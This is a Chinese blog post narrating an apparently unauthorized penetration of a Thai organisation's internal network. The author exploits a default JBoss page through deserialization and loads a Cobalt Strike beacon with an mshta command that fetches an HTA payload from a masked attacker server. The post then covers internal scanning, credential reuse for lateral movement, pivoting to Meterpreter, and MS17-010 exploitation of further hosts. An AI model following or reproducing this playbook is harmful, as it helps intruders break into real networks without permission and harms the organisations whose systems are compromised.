某内网渗透(一)

泰国某内网渗透。

Posted by hmoytx on September 12, 2019

某内网渗透(一)

起源

偶然间,随手翻到一个jboss的默认界面,一看ip还是泰国的,默认端口80是iis7的,我觉得可能有戏,掏出了jboss反序列化工具一跑,诶嘿还是administrator的,8说了开冲。
jboss

基本信息收集

看了下网络配置:
jboss1
emmm,应该是只有一个网段能用的,而且这机器似乎是有用来开虚拟机的。
jboss工具掉链子了,直接掏出cs上线了。
生成一个hta,开启文件下载服务,在工具那边执行:

mshta http://xxx.xxx.xxx.xxx:8080/download/file.ext  

上线
jboss2 查看下端口:
jboss3
开得有点多。
查看下进程:
jboss4 好像没有杀软。
查看下用户: jboss15
看起来是被日烂了,不知道内网情况怎么样。
直接在内网开始扫,把主机先发现下。
jboss5
emmm,机器还是有不少的。开始尝试下横向了。

横向

发现了一台名称有点像的机器,我这台是XXX-WEB,那台是XXX-SERVER,试了下用这台的凭证去登陆,emmm成了。
jboss6 返回了system的beacon。
jboss7 其他的试了下基本都是不行了,换一下方法,用ms17-010,不过我这个cs用这个插件有问题。用不来,就直接把beacon转成meterpreter用。
jboss8
添加下路由表。
jboss9
扫描下ms17-10
jboss10 稍等片刻
jboss11 emmm 还是挺多的。
打一下
jboss12
有返回,这时候发现了一个问题,没办法回连cs。
转换也没法转,报错,用mshta,powershell也没法执行。
等我再看看原因,再开下一篇。